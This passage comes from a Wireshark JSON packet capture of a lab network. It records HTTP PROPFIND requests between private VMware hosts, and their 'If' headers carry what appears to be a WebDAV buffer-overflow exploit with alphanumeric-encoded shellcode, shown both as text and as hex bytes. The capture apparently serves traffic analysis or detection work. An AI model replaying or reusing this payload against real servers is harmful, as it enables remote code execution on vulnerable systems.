D><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "129"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.426522000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.426522000",
|
||
"frame.time_delta": "0.000009000",
|
||
"frame.time_delta_displayed": "0.028789000",
|
||
"frame.time_relative": "16.677462000",
|
||
"frame.number": "136",
|
||
"frame.len": "349",
|
||
"frame.cap_len": "349",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "335",
|
||
"ip.id": "0x0000067e",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x000029c4",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "46587",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "46587",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "34",
|
||
"tcp.len": "283",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "641054957",
|
||
"tcp.nxtseq": "1732",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "801864009",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00005ca5",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:ca:ca:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:ca:ca:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868234",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000616000",
|
||
"tcp.analysis.bytes_in_flight": "1731",
|
||
"tcp.analysis.push_bytes_sent": "1731"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.001351000",
|
||
"tcp.time_delta": "0.000009000"
|
||
},
|
||
"tcp.payload": "79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "135",
|
||
"tcp.segment": "136",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1731",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:57:73:65:66:41:78:69:6c:6b:47:56:76:70:6b:54:4e:6f:4e:49:54:61:6a:58:63:4e:46:55:57:53:4f:6a:61:68:61:52:51:73:57:78:43:4c:52:50:50:5a:6a:4c:75:55:70:67:54:6a:48:66:78:59:45:6d:53:5a:54:5a:55:49:6a:53:45:7a:4b:75:6e:78:75:78:7a:43:4f:49:49:76:70:63:66:4a:53:68:76:6a:61:6a:78:6e:55:4d:50:75:50:67:77:77:70:64:6e:53:46:46:43:47:6e:e5:81:82:e4:99:a5:e7:8d:96:e6:b5:8e:e7:9d:ab:e5:a5:91:e5:81:87:e4:a9:b1:e4:b1:95:e4:91:96:e6:95:a2:e4:99:85:e6:91:ba:e4:85:ae:e4:89:94:e5:95:ac:c8:82:c8:82:e1:8b:80:e6:a0:83:e5:a9:85:e6:b5:8b:e7:9d:b0:e4:b5:b5:e6:b9:aa:e7:8d:b8:e4:ad:b0:e7:81:b6:e6:b9:a6:e7:8d:84:e5:a9:86:e6:91:8d:e4:9d:87:e6:8d:af:e4:a9:b6:e6:a9:8e:e7:a5:8d:e4:95:8e:e4:a1:a1:e4:b5:b1:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:52:4d:74:58:53:54:4a:58:62:4d:53:47:78:66:4f:67:74:74:45:7a:53:4a:77:44:42:49:70:6f:50:43:64:61:6e:66:75:65:41:47:42:47:44:53:48:68:44:67:4f:56:56:4f:71:7a:4c:58:5a:4a:42:6d:4a:61:4a:6d:66:50:72:70:61:69:70:57:69:78:54:6c:50:53:4a:46:79:64:4e:4b:79:59:61:51:51:62:4b:4e:4b:56:73:4f:57:74:61:68:46:53:4b:43:41:72:56:78:66:6f:54:43:e6:ad:93:e7:81:82:e5:a5:b8:e7:a9:b7:e6:9d:af:e4:bd:85:e4:91:a3:e6:9d:84:e4:b1:8d:e5:8d:a7:e7:85:83:e7:a1:8f:e4:99:85:e6:a1:a9:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e7:8d:85:e6:a1:93:e7:95:81:e7:85:b9:e1:8f:80:e6:a0:83:e6:89:b1:e5:a1:b7:e4:89:b6:e4:a5:97:e5:9d:b0:e4:9d:ab:e4:99:92:e6:ad:87:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/WsefAxilkGVvpkTNoNITajXcNFUWSOjahaRQsWxCLRPPZjLuUpgTjHfxYEmSZTZUIjSEzKunxuxzCOIIvpcfJShvjajxnUMPuPgwwpdnSFFCGn<47><6E><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/RMtXSTJXbMSGxfOgttEzSJwDBIpoPCdanfueAGBGDSHhDgOVVOqzLXZJBmJaJmfPrpaipWixTlPSJFydNKyYaQQbKNKVsOWtahFSKCArVxfoTC<54><43><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "138"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.438472000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.438472000",
|
||
"frame.time_delta": "0.000168000",
|
||
"frame.time_delta_displayed": "0.011950000",
|
||
"frame.time_relative": "16.689412000",
|
||
"frame.number": "145",
|
||
"frame.len": "347",
|
||
"frame.cap_len": "347",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
